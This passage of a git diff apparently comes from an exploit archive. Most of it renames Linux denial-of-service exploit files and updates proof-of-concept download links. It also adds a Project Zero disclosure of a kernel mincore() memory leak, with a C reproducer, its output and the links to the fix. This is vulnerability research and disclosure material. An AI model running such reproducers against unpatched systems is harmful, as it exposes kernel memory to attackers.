rename from platforms/linux/dos/42048.c rename to exploits/linux/dos/42048.c diff --git a/platforms/linux/dos/42103.js b/exploits/linux/dos/42103.js similarity index 100% rename from platforms/linux/dos/42103.js rename to exploits/linux/dos/42103.js diff --git a/platforms/linux/dos/42110.txt b/exploits/linux/dos/42110.txt similarity index 100% rename from platforms/linux/dos/42110.txt rename to exploits/linux/dos/42110.txt diff --git a/platforms/linux/dos/42115.txt b/exploits/linux/dos/42115.txt similarity index 100% rename from platforms/linux/dos/42115.txt rename to exploits/linux/dos/42115.txt diff --git a/platforms/linux/dos/42136.c b/exploits/linux/dos/42136.c similarity index 100% rename from platforms/linux/dos/42136.c rename to exploits/linux/dos/42136.c diff --git a/platforms/linux/dos/42137.txt b/exploits/linux/dos/42137.txt similarity index 100% rename from platforms/linux/dos/42137.txt rename to exploits/linux/dos/42137.txt diff --git a/platforms/linux/dos/42138.txt b/exploits/linux/dos/42138.txt similarity index 96% rename from platforms/linux/dos/42138.txt rename to exploits/linux/dos/42138.txt index 024ec4bdc..1b451a93f 100644 --- a/platforms/linux/dos/42138.txt +++ b/exploits/linux/dos/42138.txt @@ -42,4 +42,4 @@ SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42138.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42138.zip \ No newline at end of file diff --git a/platforms/linux/dos/42139.txt b/exploits/linux/dos/42139.txt similarity index 96% rename from platforms/linux/dos/42139.txt rename to exploits/linux/dos/42139.txt index 9df97d92d..701b23764 100644 --- a/platforms/linux/dos/42139.txt +++ b/exploits/linux/dos/42139.txt @@ -97,4 +97,4 @@ https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overfl Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42139.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42139.zip \ No newline at end of file diff --git a/platforms/linux/dos/42144.py b/exploits/linux/dos/42144.py similarity index 100% rename from platforms/linux/dos/42144.py rename to exploits/linux/dos/42144.py diff --git a/platforms/linux/dos/42147.txt b/exploits/linux/dos/42147.txt similarity index 95% rename from platforms/linux/dos/42147.txt rename to exploits/linux/dos/42147.txt index a21531b65..3d6e9aa0f 100644 --- a/platforms/linux/dos/42147.txt +++ b/exploits/linux/dos/42147.txt @@ -66,4 +66,4 @@ qflb.wu () dbappsecurity com cn Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42147.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42147.zip \ No newline at end of file diff --git a/platforms/linux/dos/42148.txt b/exploits/linux/dos/42148.txt similarity index 97% rename from platforms/linux/dos/42148.txt rename to exploits/linux/dos/42148.txt index c3de19383..21103af00 100644 --- a/platforms/linux/dos/42148.txt +++ b/exploits/linux/dos/42148.txt @@ -394,4 +394,4 @@ qflb.wu () dbappsecurity com cn Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42148.zip \ No newline at end of file diff --git a/platforms/linux/dos/4216.pl b/exploits/linux/dos/4216.pl similarity index 100% rename from platforms/linux/dos/4216.pl rename to exploits/linux/dos/4216.pl diff --git a/platforms/linux/dos/42162.txt b/exploits/linux/dos/42162.txt similarity index 97% rename from platforms/linux/dos/42162.txt rename to exploits/linux/dos/42162.txt index c8c46b4dd..c16c51481 100644 --- a/platforms/linux/dos/42162.txt +++ b/exploits/linux/dos/42162.txt @@ -34,4 +34,4 @@ Thread T1 (typefind:sink) created by T0 here: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42162.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42162.zip \ No newline at end of file diff --git a/platforms/linux/dos/42198.txt b/exploits/linux/dos/42198.txt similarity index 97% rename from platforms/linux/dos/42198.txt rename to exploits/linux/dos/42198.txt index 6c4153989..6fe4bb436 100644 --- a/platforms/linux/dos/42198.txt +++ b/exploits/linux/dos/42198.txt @@ -40,4 +40,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42198.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42198.zip \ No newline at end of file diff --git a/platforms/linux/dos/42199.txt b/exploits/linux/dos/42199.txt similarity index 97% rename from platforms/linux/dos/42199.txt rename to exploits/linux/dos/42199.txt index 039275550..e362a1c94 100644 --- a/platforms/linux/dos/42199.txt +++ b/exploits/linux/dos/42199.txt @@ -75,4 +75,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42199.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42199.zip \ No newline at end of file diff --git a/platforms/linux/dos/42200.txt b/exploits/linux/dos/42200.txt similarity index 96% rename from platforms/linux/dos/42200.txt rename to exploits/linux/dos/42200.txt index f7c2b35e7..fc1a427c4 100644 --- a/platforms/linux/dos/42200.txt +++ b/exploits/linux/dos/42200.txt @@ -38,4 +38,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42200.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42200.zip \ No newline at end of file diff --git a/platforms/linux/dos/42201.txt b/exploits/linux/dos/42201.txt similarity index 97% rename from platforms/linux/dos/42201.txt rename to exploits/linux/dos/42201.txt index 6ee934aec..0491a2be7 100644 --- a/platforms/linux/dos/42201.txt +++ b/exploits/linux/dos/42201.txt @@ -67,4 +67,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42201.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42201.zip \ No newline at end of file diff --git a/platforms/linux/dos/42202.txt b/exploits/linux/dos/42202.txt similarity index 96% rename from platforms/linux/dos/42202.txt rename to exploits/linux/dos/42202.txt index cdd354318..2b1ef11ee 100644 --- a/platforms/linux/dos/42202.txt +++ b/exploits/linux/dos/42202.txt @@ -34,4 +34,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42202.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42202.zip \ No newline at end of file diff --git a/platforms/linux/dos/42203.txt b/exploits/linux/dos/42203.txt similarity index 97% rename from platforms/linux/dos/42203.txt rename to exploits/linux/dos/42203.txt index 4346852da..39938ff41 100644 --- a/platforms/linux/dos/42203.txt +++ b/exploits/linux/dos/42203.txt @@ -40,4 +40,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42203.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42203.zip \ No newline at end of file diff --git a/platforms/linux/dos/42204.txt b/exploits/linux/dos/42204.txt similarity index 97% rename from platforms/linux/dos/42204.txt rename to exploits/linux/dos/42204.txt index 090ea56bb..86b9dd309 100644 --- a/platforms/linux/dos/42204.txt +++ b/exploits/linux/dos/42204.txt @@ -41,4 +41,4 @@ Error in "aarch64_ext_ldst_reglist": global-buffer-overflow Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42204.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42204.zip \ No newline at end of file diff --git a/platforms/linux/dos/42207.txt b/exploits/linux/dos/42207.txt similarity index 95% rename from platforms/linux/dos/42207.txt rename to exploits/linux/dos/42207.txt index 632d32f98..9a8887cf5 100644 --- a/platforms/linux/dos/42207.txt +++ b/exploits/linux/dos/42207.txt @@ -49,4 +49,4 @@ CVE-2017-9130 =============================== Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42207.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42207.zip \ No newline at end of file diff --git a/platforms/linux/dos/42258.txt b/exploits/linux/dos/42258.txt similarity index 97% rename from platforms/linux/dos/42258.txt rename to exploits/linux/dos/42258.txt index 23cae6bc3..87075a0a2 100644 --- a/platforms/linux/dos/42258.txt +++ b/exploits/linux/dos/42258.txt @@ -88,4 +88,4 @@ This bug was found with American Fuzzy Lop. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42258.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42258.zip \ No newline at end of file diff --git a/platforms/linux/dos/42259.txt b/exploits/linux/dos/42259.txt similarity index 97% rename from platforms/linux/dos/42259.txt rename to exploits/linux/dos/42259.txt index bbb19122c..6fb0033b7 100644 --- a/platforms/linux/dos/42259.txt +++ b/exploits/linux/dos/42259.txt @@ -88,4 +88,4 @@ https://blogs.gentoo.org/ago/2017/06/17/lame-stack-based-buffer-overflow-in-iii_ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42259.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42259.zip \ No newline at end of file diff --git a/platforms/linux/dos/42299.txt b/exploits/linux/dos/42299.txt similarity index 96% rename from platforms/linux/dos/42299.txt rename to exploits/linux/dos/42299.txt index d14d00fb2..8598fe19e 100644 --- a/platforms/linux/dos/42299.txt +++ b/exploits/linux/dos/42299.txt @@ -84,4 +84,4 @@ more info about the team, the tool or the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42299.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42299.zip \ No newline at end of file diff --git a/platforms/linux/dos/42300.txt b/exploits/linux/dos/42300.txt similarity index 94% rename from platforms/linux/dos/42300.txt rename to exploits/linux/dos/42300.txt index b5aa758cf..466138cf7 100644 --- a/platforms/linux/dos/42300.txt +++ b/exploits/linux/dos/42300.txt @@ -39,4 +39,4 @@ info about the team, the tool or the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42300.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42300.zip \ No newline at end of file diff --git a/platforms/linux/dos/42301.txt b/exploits/linux/dos/42301.txt similarity index 96% rename from platforms/linux/dos/42301.txt rename to exploits/linux/dos/42301.txt index 7e0c6f97c..288ccf2da 100644 --- a/platforms/linux/dos/42301.txt +++ b/exploits/linux/dos/42301.txt @@ -88,4 +88,4 @@ Segmentation fault Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42301.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42301.zip \ No newline at end of file diff --git a/platforms/linux/dos/42386.txt b/exploits/linux/dos/42386.txt similarity index 93% rename from platforms/linux/dos/42386.txt rename to exploits/linux/dos/42386.txt index b04b8415e..9c79064ef 100644 --- a/platforms/linux/dos/42386.txt +++ b/exploits/linux/dos/42386.txt @@ -13,4 +13,4 @@ Tested on the following configurations Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42386.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42386.zip \ No newline at end of file diff --git a/platforms/linux/dos/42389.txt b/exploits/linux/dos/42389.txt similarity index 97% rename from platforms/linux/dos/42389.txt rename to exploits/linux/dos/42389.txt index cf7ee0e11..de236b984 100644 --- a/platforms/linux/dos/42389.txt +++ b/exploits/linux/dos/42389.txt @@ -207,4 +207,4 @@ CVE-2017-9260 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42389.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42389.zip \ No newline at end of file diff --git a/platforms/linux/dos/42390.txt b/exploits/linux/dos/42390.txt similarity index 97% rename from platforms/linux/dos/42390.txt rename to exploits/linux/dos/42390.txt index 5584e7ce9..a8e95376d 100644 --- a/platforms/linux/dos/42390.txt +++ b/exploits/linux/dos/42390.txt @@ -188,4 +188,4 @@ CVE-2017-9412 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42390.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42390.zip \ No newline at end of file diff --git a/platforms/linux/dos/42391.txt b/exploits/linux/dos/42391.txt similarity index 97% rename from platforms/linux/dos/42391.txt rename to exploits/linux/dos/42391.txt index 0b48f3282..937f0fa2a 100644 --- a/platforms/linux/dos/42391.txt +++ b/exploits/linux/dos/42391.txt @@ -138,4 +138,4 @@ CVE-2017-9614 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42391.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42391.zip \ No newline at end of file diff --git a/platforms/linux/dos/42396.txt b/exploits/linux/dos/42396.txt similarity index 96% rename from platforms/linux/dos/42396.txt rename to exploits/linux/dos/42396.txt index ec047c62e..cc6e51cd0 100644 --- a/platforms/linux/dos/42396.txt +++ b/exploits/linux/dos/42396.txt @@ -93,4 +93,4 @@ CVE-2017-11330 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42396.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42396.zip \ No newline at end of file diff --git a/platforms/linux/dos/42397.txt b/exploits/linux/dos/42397.txt similarity index 96% rename from platforms/linux/dos/42397.txt rename to exploits/linux/dos/42397.txt index de87a5846..7467e652b 100644 --- a/platforms/linux/dos/42397.txt +++ b/exploits/linux/dos/42397.txt @@ -62,4 +62,4 @@ CVE-2017-11331 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42397.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42397.zip \ No newline at end of file diff --git a/platforms/linux/dos/42398.txt b/exploits/linux/dos/42398.txt similarity index 97% rename from platforms/linux/dos/42398.txt rename to exploits/linux/dos/42398.txt index ee49a32d9..e3682aa0a 100644 --- a/platforms/linux/dos/42398.txt +++ b/exploits/linux/dos/42398.txt @@ -267,4 +267,4 @@ CVE-2017-11359 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42398.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42398.zip \ No newline at end of file diff --git a/platforms/linux/dos/42399.txt b/exploits/linux/dos/42399.txt similarity index 96% rename from platforms/linux/dos/42399.txt rename to exploits/linux/dos/42399.txt index b84ddd8c8..17545127e 100644 --- a/platforms/linux/dos/42399.txt +++ b/exploits/linux/dos/42399.txt @@ -184,4 +184,4 @@ CVE-2017-11735 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42399.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42399.zip \ No newline at end of file diff --git a/platforms/linux/dos/42400.txt b/exploits/linux/dos/42400.txt similarity index 95% rename from platforms/linux/dos/42400.txt rename to exploits/linux/dos/42400.txt index 65ad5c843..cbfed8f7b 100644 --- a/platforms/linux/dos/42400.txt +++ b/exploits/linux/dos/42400.txt @@ -59,4 +59,4 @@ CVE-2017-11548 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42400.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42400.zip \ No newline at end of file diff --git a/platforms/linux/dos/42409.txt b/exploits/linux/dos/42409.txt similarity index 94% rename from platforms/linux/dos/42409.txt rename to exploits/linux/dos/42409.txt index 4a1dd4dce..425badc22 100644 --- a/platforms/linux/dos/42409.txt +++ b/exploits/linux/dos/42409.txt @@ -57,4 +57,4 @@ CVE-2017-11552 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42409.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42409.zip \ No newline at end of file diff --git a/platforms/linux/dos/42433.txt b/exploits/linux/dos/42433.txt similarity index 96% rename from platforms/linux/dos/42433.txt rename to exploits/linux/dos/42433.txt index d75c1ec78..e619139cf 100644 --- a/platforms/linux/dos/42433.txt +++ b/exploits/linux/dos/42433.txt @@ -352,4 +352,4 @@ https://github.com/Mindwerks/wildmidi/commit/660b513d99bced8783a4a5984ac2f742c74 POC: ========== https://github.com/Mindwerks/wildmidi/files/1186857/poc.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42433.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42433.zip \ No newline at end of file diff --git a/platforms/linux/dos/42546.txt b/exploits/linux/dos/42546.txt similarity index 97% rename from platforms/linux/dos/42546.txt rename to exploits/linux/dos/42546.txt index 8bfeec51e..753f0a915 100644 --- a/platforms/linux/dos/42546.txt +++ b/exploits/linux/dos/42546.txt @@ -584,4 +584,4 @@ CVE-2017-12954 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42546.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42546.zip \ No newline at end of file diff --git a/platforms/linux/dos/42600.txt b/exploits/linux/dos/42600.txt similarity index 97% rename from platforms/linux/dos/42600.txt rename to exploits/linux/dos/42600.txt index b03ace6f7..bb448edd2 100644 --- a/platforms/linux/dos/42600.txt +++ b/exploits/linux/dos/42600.txt @@ -83,4 +83,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42600.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42600.zip \ No newline at end of file diff --git a/platforms/linux/dos/42652.txt b/exploits/linux/dos/42652.txt similarity index 100% rename from platforms/linux/dos/42652.txt rename to exploits/linux/dos/42652.txt diff --git a/platforms/linux/dos/42762.txt b/exploits/linux/dos/42762.txt similarity index 100% rename from platforms/linux/dos/42762.txt rename to exploits/linux/dos/42762.txt diff --git a/platforms/linux/dos/42932.c b/exploits/linux/dos/42932.c similarity index 100% rename from platforms/linux/dos/42932.c rename to exploits/linux/dos/42932.c diff --git a/platforms/linux/dos/42970.txt b/exploits/linux/dos/42970.txt similarity index 97% rename from platforms/linux/dos/42970.txt rename to exploits/linux/dos/42970.txt index 247ec163b..bc6c5dacd 100644 --- a/platforms/linux/dos/42970.txt +++ b/exploits/linux/dos/42970.txt @@ -91,7 +91,7 @@ CVE-2017-14939 Reproducer: https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42970.zip Timeline: 2017-09-21: bug discovered and reported to upstream @@ -109,4 +109,4 @@ https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-r Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42970.zip \ No newline at end of file diff --git a/platforms/linux/dos/43010.c b/exploits/linux/dos/43010.c similarity index 100% rename from platforms/linux/dos/43010.c rename to exploits/linux/dos/43010.c diff --git a/platforms/linux/dos/43014.txt b/exploits/linux/dos/43014.txt similarity index 97% rename from platforms/linux/dos/43014.txt rename to exploits/linux/dos/43014.txt index 3b8ff1be0..07f9bf457 100644 --- a/platforms/linux/dos/43014.txt +++ b/exploits/linux/dos/43014.txt @@ -283,4 +283,4 @@ which would mean that this is a potentially exploitable issue in release builds. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43014.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43014.zip \ No newline at end of file diff --git a/exploits/linux/dos/43178.c b/exploits/linux/dos/43178.c new file mode 100644 index 000000000..f4cfb32af --- /dev/null +++ b/exploits/linux/dos/43178.c @@ -0,0 +1,53 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431 + +I found the following bug with an AFL-based fuzzer: + +When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace. + +This bug can be reproduced with the following testcase: +*/ + +$ cat mincore_test.c +#define _GNU_SOURCE +#include +#include +#include +#include + +unsigned char mcbuf[0x1000]; + +int main(void) { + if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) + err(1, "mmap"); + + for (int i=0; i<10000; i++) { + if (mincore((void*)0x86000000, 0x1000000, mcbuf)) + perror("mincore"); + write(1, mcbuf, 0x1000); + } +} + +/* +$ gcc -o mincore_test mincore_test.c -Wall +$ ./mincore_test | hexdump -C | head +00000000 00 00 00 00 00 00 00 00 00 00 00 00 fe 01 00 00 |................| +00000010 80 49 3d 20 c6 e9 ff ff c0 49 3d 20 c6 e9 ff ff |.I= .....I= ....| +00000020 00 08 3c 20 c6 e9 ff ff 40 08 3c 20 c6 e9 ff ff |..< ....@.< ....| +00000030 80 08 3c 20 c6 e9 ff ff c0 08 3c 20 c6 e9 ff ff |..< ......< ....| +00000040 00 09 3c 20 c6 e9 ff ff 40 09 3c 20 c6 e9 ff ff |..< ....@.< ....| +00000050 80 09 3c 20 c6 e9 ff ff c0 09 3c 20 c6 e9 ff ff |..< ......< ....| +00000060 00 06 3c 20 c6 e9 ff ff 40 06 3c 20 c6 e9 ff ff |..< ....@.< ....| +00000070 80 06 3c 20 c6 e9 ff ff c0 06 3c 20 c6 e9 ff ff |..< ......< ....| +00000080 00 07 3c 20 c6 e9 ff ff 40 07 3c 20 c6 e9 ff ff |..< ....@.< ....| +00000090 80 07 3c 20 c6 e9 ff ff 80 78 84 0b c6 e9 ff ff |..< .....x......| + +fixed at https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c + +The fix has landed in the following upstream stable releases: +https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2 +https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.13.16 +https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.9.65 +https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.101 + +*/ \ No newline at end of file diff --git a/platforms/linux/dos/4347.pl b/exploits/linux/dos/4347.pl similarity index 100% rename from platforms/linux/dos/4347.pl rename to exploits/linux/dos/4347.pl diff --git a/platforms/linux/dos/4532.pl b/exploits/linux/dos/4532.pl similarity index 100% rename from platforms/linux/dos/4532.pl rename to exploits/linux/dos/4532.pl diff --git a/platforms/linux/dos/4535.pl b/exploits/linux/dos/4535.pl similarity index 100% rename from platforms/linux/dos/4535.pl rename to exploits/linux/dos/4535.pl diff --git a/platforms/linux/dos/4600.py b/exploits/linux/dos/4600.py similarity index 100% rename from platforms/linux/dos/4600.py rename to exploits/linux/dos/4600.py diff --git a/platforms/linux/dos/4732.c b/exploits/linux/dos/4732.c similarity index 100% rename from platforms/linux/dos/4732.c rename to exploits/linux/dos/4732.c diff --git a/platforms/linux/dos/4893.c b/exploits/linux/dos/4893.c similarity index 100% rename from platforms/linux/dos/4893.c rename to exploits/linux/dos/4893.c diff --git a/platforms/linux/dos/5210.c b/exploits/linux/dos/5210.c similarity index 100% rename from platforms/linux/dos/5210.c rename to exploits/linux/dos/5210.c diff --git a/platforms/linux/dos/5307.pl b/exploits/linux/dos/5307.pl similarity index 100% rename from platforms/linux/dos/5307.pl rename to exploits/linux/dos/5307.pl diff --git a/platforms/linux/dos/5458.txt b/exploits/linux/dos/5458.txt similarity index 100% rename from platforms/linux/dos/5458.txt rename to exploits/linux/dos/5458.txt diff --git a/platforms/linux/dos/551.c b/exploits/linux/dos/551.c similarity index 100% rename from platforms/linux/dos/551.c rename to exploits/linux/dos/551.c diff --git a/platforms/linux/dos/5561.pl b/exploits/linux/dos/5561.pl similarity index 100% rename from platforms/linux/dos/5561.pl rename to exploits/linux/dos/5561.pl diff --git a/platforms/linux/dos/5585.pl b/exploits/linux/dos/5585.pl similarity index 100% rename from platforms/linux/dos/5585.pl rename to exploits/linux/dos/5585.pl diff --git a/platforms/linux/dos/5814.pl b/exploits/linux/dos/5814.pl similarity index 100% rename from platforms/linux/dos/5814.pl rename to exploits/linux/dos/5814.pl diff --git a/platforms/linux/dos/6493.pl b/exploits/linux/dos/6493.pl similarity index 100% rename from platforms/linux/dos/6493.pl rename to exploits/linux/dos/6493.pl diff --git a/platforms/linux/dos/6689.txt b/exploits/linux/dos/6689.txt similarity index 100% rename from platforms/linux/dos/6689.txt rename to exploits/linux/dos/6689.txt diff --git a/platforms/linux/dos/6704.txt b/exploits/linux/dos/6704.txt similarity index 100% rename from platforms/linux/dos/6704.txt rename to exploits/linux/dos/6704.txt diff --git a/platforms/linux/dos/6718.html b/exploits/linux/dos/6718.html similarity index 100% rename from platforms/linux/dos/6718.html rename to exploits/linux/dos/6718.html diff --git a/platforms/linux/dos/68.c b/exploits/linux/dos/68.c similarity index 100% rename from platforms/linux/dos/68.c rename to exploits/linux/dos/68.c diff --git a/platforms/linux/dos/685.c b/exploits/linux/dos/685.c similarity index 100% rename from platforms/linux/dos/685.c rename to exploits/linux/dos/685.c diff --git a/platforms/linux/dos/686.c b/exploits/linux/dos/686.c similarity index 100% rename from platforms/linux/dos/686.c rename to exploits/linux/dos/686.c diff --git a/platforms/linux/dos/690.c b/exploits/linux/dos/690.c similarity index 100% rename from platforms/linux/dos/690.c rename to exploits/linux/dos/690.c diff --git a/platforms/linux/dos/691.c b/exploits/linux/dos/691.c similarity index 100% rename from platforms/linux/dos/691.c rename to exploits/linux/dos/691.c diff --git a/platforms/linux/dos/692.c b/exploits/linux/dos/692.c similarity index 100% rename from platforms/linux/dos/692.c rename to exploits/linux/dos/692.c diff --git a/platforms/linux/dos/7091.c b/exploits/linux/dos/7091.c similarity index 100% rename from platforms/linux/dos/7091.c rename to exploits/linux/dos/7091.c diff --git a/platforms/linux/dos/7100.pl b/exploits/linux/dos/7100.pl similarity index 100% rename from platforms/linux/dos/7100.pl rename to exploits/linux/dos/7100.pl diff --git a/platforms/linux/dos/7150.html b/exploits/linux/dos/7150.html similarity index 100% rename from platforms/linux/dos/7150.html rename to exploits/linux/dos/7150.html diff --git a/platforms/linux/dos/7405.c b/exploits/linux/dos/7405.c similarity index 100% rename from platforms/linux/dos/7405.c rename to exploits/linux/dos/7405.c diff --git a/platforms/linux/dos/7454.c b/exploits/linux/dos/7454.c similarity index 100% rename from platforms/linux/dos/7454.c rename to exploits/linux/dos/7454.c diff --git a/platforms/linux/dos/789.c b/exploits/linux/dos/789.c similarity index 100% rename from platforms/linux/dos/789.c rename to exploits/linux/dos/789.c diff --git a/platforms/linux/dos/815.c b/exploits/linux/dos/815.c similarity index 100% rename from platforms/linux/dos/815.c rename to exploits/linux/dos/815.c diff --git a/platforms/linux/dos/8205.pl b/exploits/linux/dos/8205.pl similarity index 100% rename from platforms/linux/dos/8205.pl rename to exploits/linux/dos/8205.pl diff --git a/platforms/linux/dos/842.c b/exploits/linux/dos/842.c similarity index 100% rename from platforms/linux/dos/842.c rename to exploits/linux/dos/842.c diff --git a/platforms/linux/dos/8469.c b/exploits/linux/dos/8469.c similarity index 100% rename from platforms/linux/dos/8469.c rename to exploits/linux/dos/8469.c diff --git a/platforms/linux/dos/8544.pl b/exploits/linux/dos/8544.pl similarity index 100% rename from platforms/linux/dos/8544.pl rename to exploits/linux/dos/8544.pl diff --git a/platforms/linux/dos/8955.pl b/exploits/linux/dos/8955.pl similarity index 100% rename from platforms/linux/dos/8955.pl rename to exploits/linux/dos/8955.pl diff --git a/platforms/linux/dos/8960.py b/exploits/linux/dos/8960.py similarity index 100% rename from platforms/linux/dos/8960.py rename to exploits/linux/dos/8960.py diff --git a/platforms/linux/dos/8982.txt b/exploits/linux/dos/8982.txt similarity index 100% rename from platforms/linux/dos/8982.txt rename to exploits/linux/dos/8982.txt diff --git a/platforms/linux/dos/904.c b/exploits/linux/dos/904.c similarity index 100% rename from platforms/linux/dos/904.c rename to exploits/linux/dos/904.c diff --git a/platforms/linux/dos/911.c b/exploits/linux/dos/911.c similarity index 100% rename from platforms/linux/dos/911.c rename to exploits/linux/dos/911.c diff --git a/platforms/linux/dos/9264.py b/exploits/linux/dos/9264.py similarity index 100% rename from platforms/linux/dos/9264.py rename to 